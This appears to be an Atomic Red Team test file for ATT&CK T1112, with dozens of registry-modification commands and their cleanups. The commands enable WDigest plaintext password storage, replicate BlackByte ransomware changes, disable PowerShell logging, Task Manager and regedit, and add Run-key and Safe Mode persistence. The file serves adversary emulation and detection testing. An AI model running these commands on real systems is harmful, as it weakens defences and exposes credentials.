attack_technique: T1112
display_name: Modify Registry
atomic_tests:
- name: Modify Registry of Current User Profile - cmd
  auto_generated_guid: 1324796b-d0f6-455a-b4ae-21ffee6aa6b9
  description: |
    Modify the registry of the currently logged in user using reg.exe via cmd console. Upon execution, the message "The operation completed successfully."
    will be displayed. Additionally, open Registry Editor to view the new entry in HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced.
  supported_platforms:
  - windows
  executor:
    command: |
      reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /t REG_DWORD /v HideFileExt /d 1 /f
    cleanup_command: |
      reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v HideFileExt /f >nul 2>&1
    name: command_prompt
- name: Modify Registry of Local Machine - cmd
  auto_generated_guid: 282f929a-6bc5-42b8-bd93-960c3ba35afe
  description: |
    Modify the Local Machine registry RUN key to change Windows Defender executable that should be ran on startup.  This should only be possible when
    CMD is ran as Administrative rights. Upon execution, the message "The operation completed successfully."
    will be displayed. Additionally, open Registry Editor to view the modified entry in HKLM\Software\Microsoft\Windows\CurrentVersion\Run.
  supported_platforms:
  - windows
  input_arguments:
    new_executable:
      description: New executable to run on startup instead of Windows Defender
      type: string
      default: calc.exe
  executor:
    command: |
      reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /t REG_EXPAND_SZ /v SecurityHealth /d #{new_executable} /f
    cleanup_command: |
      reg delete HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v SecurityHealth /f >nul 2>&1
    name: command_prompt
    elevation_required: true
- name: Modify registry to store logon credentials
  auto_generated_guid: c0413fb5-33e2-40b7-9b6f-60b29f4a7a18
  description: |
    Sets registry key that will tell windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping).
    Upon execution, the message "The operation completed successfully." will be displayed.
    Additionally, open Registry Editor to view the modified entry in HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest.
  supported_platforms:
  - windows
  executor:
    command: |
      reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
    cleanup_command: |
      reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f >nul 2>&1
    name: command_prompt
    elevation_required: true
- name: Use Powershell to Modify registry to store logon credentials
  auto_generated_guid: 68254a85-aa42-4312-a695-38b7276307f8
  description: |
    Sets registry key using Powershell that will tell windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping).
    Open Registry Editor to view the modified entry in HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest.
  supported_platforms:
  - windows
  executor:
    command: |
      Set-ItemProperty -Force -Path  'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' -Name  'UseLogonCredential' -Value '1' -ErrorAction Ignore
    cleanup_command: |
      Set-ItemProperty -Force -Path  'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' -Name  'UseLogonCredential' -Value '0' -ErrorAction Ignore
    name: powershell
    elevation_required: true
- name: Add domain to Trusted sites Zone
  auto_generated_guid: cf447677-5a4e-4937-a82c-e47d254afd57
  description: |
    Attackers may add a domain to the trusted site zone to bypass defenses. Doing this enables attacks such as c2 over office365.
    Upon execution, details of the new registry entries will be displayed.
    Additionally, open Registry Editor to view the modified entry in HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\.

    https://www.blackhat.com/docs/us-17/wednesday/us-17-Dods-Infecting-The-Enterprise-Abusing-Office365-Powershell-For-Covert-C2.pdf
  supported_platforms:
  - windows
  input_arguments:
    bad_domain:
      description: Domain to add to trusted site zone
      type: string
      default: bad-domain.com
  executor:
    command: |
      $key= "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\#{bad_domain}\"
      $name ="bad-subdomain"
      new-item $key -Name $name -Force
      new-itemproperty $key$name -Name https -Value 2 -Type DWORD;
      new-itemproperty $key$name -Name http  -Value 2 -Type DWORD;
      new-itemproperty $key$name -Name *     -Value 2 -Type DWORD;
    cleanup_command: |
      $key = "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\#{bad_domain}\"
      Remove-item  $key -Recurse -ErrorAction Ignore
    name: powershell
- name: Javascript in registry
  auto_generated_guid: 15f44ea9-4571-4837-be9e-802431a7bfae
  description: |
    Upon execution, a javascript block will be placed in the registry for persistence.
    Additionally, open Registry Editor to view the modified entry in HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings.
  supported_platforms:
  - windows
  executor:
    command: |
      New-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings" -Name T1112 -Value "<script>"
    cleanup_command: |
      Remove-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings" -Name T1112 -ErrorAction Ignore
    name: powershell
- name: Change Powershell Execution Policy to Bypass
  auto_generated_guid: f3a6cceb-06c9-48e5-8df8-8867a6814245
  description: |
    Attackers need to change the powershell execution policy in order to run their malicious powershell scripts.
    They can either specify it during the execution of the powershell script or change the registry value for it.
  supported_platforms:
  - windows
  input_arguments:
    default_execution_policy:
      description: Specify the default poweshell execution policy
      type: string
      default: Default
  executor:
    command: |
      Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope LocalMachine
    cleanup_command: |
      try { Set-ExecutionPolicy -ExecutionPolicy #{default_execution_policy} -Scope LocalMachine -Force } catch {}
    name: powershell
- name: BlackByte Ransomware Registry Changes - CMD
  auto_generated_guid: 4f4e2f9f-6209-4fcf-9b15-3b7455706f5b
  description: |
    This task recreates the steps taken by BlackByte ransomware before it worms to other machines.  See "Preparing to Worm" section: https://redcanary.com/blog/blackbyte-ransomware/
    The steps are as follows:
    <ol>
        <li>1. Elevate Local Privilege by disabling UAC Remote Restrictions</li>
        <li>2. Enable OS to share network connections between different privilege levels</li>
        <li>3. Enable long path values for file paths, names, and namespaces to ensure encryption of all file names and paths</li>
    </ol>
    The registry keys and their respective values will be created upon successful execution.
  supported_platforms:
  - windows
  executor:
    command: |
      cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
      cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
      cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v LongPathsEnabled /t REG_DWORD /d 1 /f
    cleanup_command: |
      reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ /v LocalAccountTokenFilterPolicy /f >nul 2>&1
      reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLinkedConnections /f >nul 2>&1
      reg delete HKLM\SYSTEM\CurrentControlSet\Control\FileSystem\ /v LongPathsEnabled /f >nul 2>&1
    name: command_prompt
    elevation_required: true
- name: BlackByte Ransomware Registry Changes - Powershell
  auto_generated_guid: 0b79c06f-c788-44a2-8630-d69051f1123d
  description: |
    This task recreates the steps taken by BlackByte ransomware before it worms to other machines via Powershell.  See "Preparing to Worm" section: https://redcanary.com/blog/blackbyte-ransomware/
    The steps are as follows:
    <ol>
        <li>1. Elevate Local Privilege by disabling UAC Remote Restrictions</li>
        <li>2. Enable OS to share network connections between different privilege levels</li>
        <li>3. Enable long path values for file paths, names, and namespaces to ensure encryption of all file names and paths</li>
    </ol>
    The registry keys and their respective values will be created upon successful execution.
  supported_platforms:
  - windows
  executor:
    command: |
      New-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name LocalAccountTokenFilterPolicy -PropertyType DWord -Value 1 -Force
      New-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name EnableLinkedConnections -PropertyType DWord -Value 1 -Force
      New-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem" -Name LongPathsEnabled -PropertyType DWord -Value 1 -Force
    cleanup_command: |
      Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name LocalAccountTokenFilterPolicy -Force -ErrorAction Ignore
      Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name EnableLinkedConnections -Force -ErrorAction Ignore
      Remove-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem" -Name LongPathsEnabled -Force -ErrorAction Ignore
    name: powershell
    elevation_required: true
- name: Disable Windows Registry Tool
  auto_generated_guid: ac34b0f7-0f85-4ac0-b93e-3ced2bc69bb8
  description: |
    Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows registry tool to prevent user modifying registry entry.
    See example how Agent Tesla malware abuses this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry
  supported_platforms:
  - windows
  executor:
    command: |
      reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\policies\system /v DisableRegistryTools /t REG_DWORD /d 1 /f
    cleanup_command: |
      powershell Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\policies\system" -Name DisableRegistryTools -ErrorAction Ignore
    name: command_prompt
    elevation_required: true
- name: Disable Windows CMD application
  auto_generated_guid: d2561a6d-72bd-408c-b150-13efe1801c2a
  description: |
    Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows CMD application.
    See example how Agent Tesla malware abuses this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry
  supported_platforms:
  - windows
  executor:
    command: |
      New-ItemProperty -Path "HKCU:\Software\Policies\Microsoft\Windows\System" -Name DisableCMD -Value 1
    cleanup_command: |
      Remove-ItemProperty -Path "HKCU:\Software\Policies\Microsoft\Windows\System" -Name DisableCMD -ErrorAction Ignore
    name: powershell
    elevation_required: true
- name: Disable Windows Task Manager application
  auto_generated_guid: af254e70-dd0e-4de6-9afe-a994d9ea8b62
  description: |
    Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows task manager application.
    See example how Agent Tesla malware abuses this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry
  supported_platforms:
  - windows
  executor:
    command: |
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskmgr /t REG_DWORD /d 1 /f
    cleanup_command: |
      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskmgr /f >nul 2>&1
    name: command_prompt
    elevation_required: true
- name: Disable Windows Notification Center
  auto_generated_guid: c0d6d67f-1f63-42cc-95c0-5fd6b20082ad
  description: |
    Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows notification center.
    See how remcos rat abuses this technique- https://tccontre.blogspot.com/2020/01/remcos-rat-evading-windows-defender-av.html
  supported_platforms:
  - windows
  executor:
    command: |
      reg add HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Explorer /v DisableNotificationCenter /t REG_DWORD /d 1 /f
    cleanup_command: |
      reg delete HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Explorer /v DisableNotificationCenter /f >nul 2>&1
    name: command_prompt
    elevation_required: true
- name: Disable Windows Shutdown Button
  auto_generated_guid: 6e0d1131-2d7e-4905-8ca5-d6172f05d03d
  description: |
    Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows shutdown button.
    See how ransomware abuses this technique- https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/ransom.msil.screenlocker.a/
  supported_platforms:
  - windows
  executor:
    command: |
      reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v shutdownwithoutlogon /t REG_DWORD /d 0 /f
    cleanup_command: |
      reg delete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v shutdownwithoutlogon /f >nul 2>&1
    name: command_prompt
    elevation_required: true
- name: Disable Windows LogOff Button
  auto_generated_guid: e246578a-c24d-46a7-9237-0213ff86fb0c
  description: |
    Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows logoff button.
    See how ransomware abuses this technique- https://www.trendmicro.com/vinfo/be/threat-encyclopedia/search/js_noclose.e/2
  supported_platforms:
  - windows
  executor:
    command: |
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoLogOff /t REG_DWORD /d 1 /f
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v StartMenuLogOff /t REG_DWORD /d 1 /f
    cleanup_command: |
      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoLogOff /f >nul 2>&1
      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v StartMenuLogOff /f >nul 2>&1
    name: command_prompt
    elevation_required: true
- name: Disable Windows Change Password Feature
  auto_generated_guid: d4a6da40-618f-454d-9a9e-26af552aaeb0
  description: |
    Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows change password feature.
    See how ransomware abuses this technique- https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/ransom_heartbleed.thdobah
  supported_platforms:
  - windows
  executor:
    command: |
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableChangePassword /t REG_DWORD /d 1 /f
    cleanup_command: |
      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableChangePassword /f >nul 2>&1
    name: command_prompt
    elevation_required: true
- name: Disable Windows Lock Workstation Feature
  auto_generated_guid: 3dacb0d2-46ee-4c27-ac1b-f9886bf91a56
  description: |
    Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows Lock workstation feature.
    See how ransomware abuses this technique- https://www.bleepingcomputer.com/news/security/in-dev-ransomware-forces-you-do-to-survey-before-unlocking-computer/
  supported_platforms:
  - windows
  executor:
    command: |
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableLockWorkstation /t REG_DWORD /d 1 /f
    cleanup_command: |
      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableLockWorkstation /f >nul 2>&1
    name: command_prompt
    elevation_required: true
- name: Activate Windows NoDesktop Group Policy Feature
  auto_generated_guid: 93386d41-525c-4a1b-8235-134a628dee17
  description: |
    Modify the registry of the currently logged in user using reg.exe via cmd console to hide all icons on Desktop Group Policy. 
    Take note that some Group Policy changes might require a restart to take effect.
    See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis
  supported_platforms:
  - windows
  executor:
    command: |
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDesktop /t REG_DWORD /d 1 /f
    cleanup_command: |
      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDesktop /f >nul 2>&1
    name: command_prompt
    elevation_required: true
- name: Activate Windows NoRun Group Policy Feature
  auto_generated_guid: d49ff3cc-8168-4123-b5b3-f057d9abbd55
  description: |
    Modify the registry of the currently logged in user using reg.exe via cmd console to Remove Run menu from Start Menu Group Policy.
    Take note that some Group Policy changes might require a restart to take effect.
    See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis
  supported_platforms:
  - windows
  executor:
    command: |
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f
    cleanup_command: |
      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /f 
    name: command_prompt
    elevation_required: true
- name: Activate Windows NoFind Group Policy Feature
  auto_generated_guid: ffbb407e-7f1d-4c95-b22e-548169db1fbd
  description: |
    Modify the registry of the currently logged in user using reg.exe via cmd console to Remove Search menu from Start Menu Group Policy.
    Take note that some Group Policy changes might require a restart to take effect.
    See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis
  supported_platforms:
  - windows
  executor:
    command: |
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFind /t REG_DWORD /d 1 /f
    cleanup_command: |
      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFind /f >nul 2>&1
    name: command_prompt
    elevation_required: true
- name: Activate Windows NoControlPanel Group Policy Feature
  auto_generated_guid: a450e469-ba54-4de1-9deb-9023a6111690
  description: |
    Modify the registry of the currently logged in user using reg.exe via cmd console to Disable Control Panel Group Policy. 
    Take note that some Group Policy changes might require a restart to take effect.
    See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis
  supported_platforms:
  - windows
  executor:
    command: |
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
    cleanup_command: |
      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /f >nul 2>&1
    name: command_prompt
    elevation_required: true
- name: Activate Windows NoFileMenu Group Policy Feature
  auto_generated_guid: 5e27bdb4-7fd9-455d-a2b5-4b4b22c9dea4
  description: |
    Modify the registry of the currently logged in user using reg.exe via cmd console to Remove File menu from Windows Explorer Group Policy. 
    Take note that some Group Policy changes might require a restart to take effect.
    See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis
  supported_platforms:
  - windows
  executor:
    command: |
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFileMenu /t REG_DWORD /d 1 /f
    cleanup_command: |
      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFileMenu /f >nul 2>&1
    name: command_prompt
    elevation_required: true
- name: Activate Windows NoClose Group Policy Feature
  auto_generated_guid: 12f50e15-dbc6-478b-a801-a746e8ba1723
  description: |
    Modify the registry of the currently logged in user using reg.exe via cmd console to Disable and remove the Shut Down command Group Policy. 
    Take note that some Group Policy changes might require a restart to take effect.
    See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis
  supported_platforms:
  - windows
  executor:
    command: |
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /t REG_DWORD /d 1 /f
    cleanup_command: |
      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /f >nul 2>&1
    name: command_prompt
    elevation_required: true
- name: Activate Windows NoSetTaskbar Group Policy Feature
  auto_generated_guid: d29b7faf-7355-4036-9ed3-719bd17951ed
  description: |
    Modify the registry of the currently logged in user using reg.exe via cmd console to Disable changes to Taskbar and Start Menu Settings Group Policy. 
    Take note that some Group Policy changes might require a restart to take effect.
    See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
  supported_platforms:
  - windows
  executor:
    command: |
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSetTaskbar /t REG_DWORD /d 1 /f
    cleanup_command: |
      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSetTaskbar /f >nul 2>&1
    name: command_prompt
    elevation_required: true
- name: Activate Windows NoTrayContextMenu Group Policy Feature
  auto_generated_guid: 4d72d4b1-fa7b-4374-b423-0fe326da49d2
  description: |
    Modify the registry of the currently logged in user using reg.exe via cmd console to Disable context menu for taskbar Group Policy. 
    Take note that some Group Policy changes might require a restart to take effect.
    See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
  supported_platforms:
  - windows
  executor:
    command: |
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoTrayContextMenu /t REG_DWORD /d 1 /f
    cleanup_command: |
      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoTrayContextMenu /f >nul 2>&1
    name: command_prompt
    elevation_required: true
- name: Activate Windows NoPropertiesMyDocuments Group Policy Feature
  auto_generated_guid: 20fc9daa-bd48-4325-9aff-81b967a84b1d
  description: |
    Modify the registry of the currently logged in user using reg.exe via cmd console to hide Properties from "My Documents icon" Group Policy. 
    Take note that some Group Policy changes might require a restart to take effect.
    See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
  supported_platforms:
  - windows
  executor:
    command: |
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoPropertiesMyDocuments /t REG_DWORD /d 1 /f
    cleanup_command: |
      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoPropertiesMyDocuments /f >nul 2>&1
    name: command_prompt
    elevation_required: true
- name: Hide Windows Clock Group Policy Feature
  auto_generated_guid: 8023db1e-ad06-4966-934b-b6a0ae52689e
  description: |
    Modify the registry of the currently logged in user using reg.exe via cmd console to Hide Clock Group Policy. 
    Take note that some Group Policy changes might require a restart to take effect.
    See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
  supported_platforms:
  - windows
  executor:
    command: |
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideClock /t REG_DWORD /d 1 /f
    cleanup_command: |
      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideClock /f >nul 2>&1
    name: command_prompt
    elevation_required: true
- name: Windows HideSCAHealth Group Policy Feature
  auto_generated_guid: a4637291-40b1-4a96-8c82-b28f1d73e54e
  description: |
    Modify the registry of the currently logged in user using reg.exe via cmd console to remove security and maintenance icon Group Policy. 
    Take note that some Group Policy changes might require a restart to take effect.
    See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
  supported_platforms:
  - windows
  executor:
    command: |
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCAHealth /t REG_DWORD /d 1 /f
    cleanup_command: |
      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCAHealth /f >nul 2>&1
    name: command_prompt
    elevation_required: true
- name: Windows HideSCANetwork Group Policy Feature
  auto_generated_guid: 3e757ce7-eca0-411a-9583-1c33b8508d52
  description: |
    Modify the registry of the currently logged in user using reg.exe via cmd console to remove the networking icon Group Policy. 
    Take note that some Group Policy changes might require a restart to take effect.
    See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
  supported_platforms:
  - windows
  executor:
    command: |
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCANetwork /t REG_DWORD /d 1 /f
    cleanup_command: |
      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCANetwork /f >nul 2>&1
    name: command_prompt
    elevation_required: true
- name: Windows HideSCAPower Group Policy Feature
  auto_generated_guid: 8d85a5d8-702f-436f-bc78-fcd9119496fc
  description: |
    Modify the registry of the currently logged in user using reg.exe via cmd console to remove the battery icon Group Policy. 
    Take note that some Group Policy changes might require a restart to take effect.
    See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
  supported_platforms:
  - windows
  executor:
    command: |
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCAPower /t REG_DWORD /d 1 /f
    cleanup_command: |
      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCAPower /f >nul 2>&1
    name: command_prompt
    elevation_required: true
- name: Windows HideSCAVolume Group Policy Feature
  auto_generated_guid: 7f037590-b4c6-4f13-b3cc-e424c5ab8ade
  description: |
    Modify the registry of the currently logged in user using reg.exe via cmd console to remove the volume icon Group Policy. 
    Take note that some Group Policy changes might require a restart to take effect..
    See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
  supported_platforms:
  - windows
  executor:
    command: |
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCAVolume /t REG_DWORD /d 1 /f
    cleanup_command: |
      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCAVolume /f >nul 2>&1
    name: command_prompt
    elevation_required: true
- name: Windows Modify Show Compress Color And Info Tip Registry
  auto_generated_guid: 795d3248-0394-4d4d-8e86-4e8df2a2693f
  description: |
    Modify the registry of the currently logged in user using reg.exe via cmd console to show compress color and show tips feature. 
    See how hermeticwiper uses this technique - https://www.splunk.com/en_us/blog/security/detecting-hermeticwiper.html
  supported_platforms:
  - windows
  executor:
    command: |
      reg  add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowInfoTip /t REG_DWORD /d 0 /f
      reg  add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowCompColor /t REG_DWORD /d 0 /f
    cleanup_command: |
      reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowInfoTip /f >nul 2>&1
      reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowCompColor /f >nul 2>&1
    name: command_prompt
- name: Windows Powershell Logging Disabled
  auto_generated_guid: 95b25212-91a7-42ff-9613-124aca6845a8
  description: |
    Modify the registry of the currently logged in user using reg.exe via cmd console to disable Powershell Module Logging, Script Block Logging, Transcription and Script Execution
    see https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.PowerShell::EnableModuleLogging
  supported_platforms:
  - windows
  executor:
    command: |
      reg  add HKCU\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging /v EnableModuleLogging /t REG_DWORD /d 0 /f
      reg  add HKCU\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging /v EnableScriptBlockLogging /t REG_DWORD /d 0 /f
      reg  add HKCU\Software\Policies\Microsoft\Windows\PowerShell\Transcription /v EnableTranscripting /t REG_DWORD /d 0 /f
      reg  add HKCU\Software\Policies\Microsoft\Windows\PowerShell /v EnableScripts /t REG_DWORD /d 0 /f
      reg delete HKCU\Software\Policies\Microsoft\Windows\PowerShell /v EnableScripts /f >nul 2>&1
    cleanup_command: |
      reg delete HKCU\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging /v EnableModuleLogging /f >nul 2>&1
      reg delete HKCU\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging /v EnableScriptBlockLogging /f >nul 2>&1
      reg delete HKCU\Software\Policies\Microsoft\Windows\PowerShell\Transcription /v EnableTranscripting /f >nul 2>&1
    name: command_prompt
    elevation_required: true
- name: Windows Add Registry Value to Load Service in Safe Mode without Network
  auto_generated_guid: 1dd59fb3-1cb3-4828-805d-cf80b4c3bbb5
  description: |
    Modify the registry to allow a driver, service, to persist in Safe Mode.
    see https://redcanary.com/blog/tracking-driver-inventory-to-expose-rootkits/ and https://blog.didierstevens.com/2007/03/26/playing-with-safe-mode/ for further details.
    Adding a subkey to Minimal with the name of your service and a default value set to Service, makes that your service will be started when you boot into Safe Mode without networking. The same applies for the Network subkey.
  supported_platforms:
  - windows
  executor:
    command: |
      REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AtomicSafeMode" /VE /T REG_SZ /F /D "Service"
    cleanup_command: |
      reg delete "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AtomicSafeMode" /f
    name: command_prompt
    elevation_required: true
- name: Windows Add Registry Value to Load Service in Safe Mode with Network
  auto_generated_guid: c173c948-65e5-499c-afbe-433722ed5bd4
  description: |
    Modify the registry to allow a driver, service, to persist in Safe Mode with networking.
    see https://redcanary.com/blog/tracking-driver-inventory-to-expose-rootkits/ and https://blog.didierstevens.com/2007/03/26/playing-with-safe-mode/ for further details.
    Adding a subkey to Netowrk with the name of your service and a default value set to Service, makes that your service will be started when you boot into Safe Mode with networking.
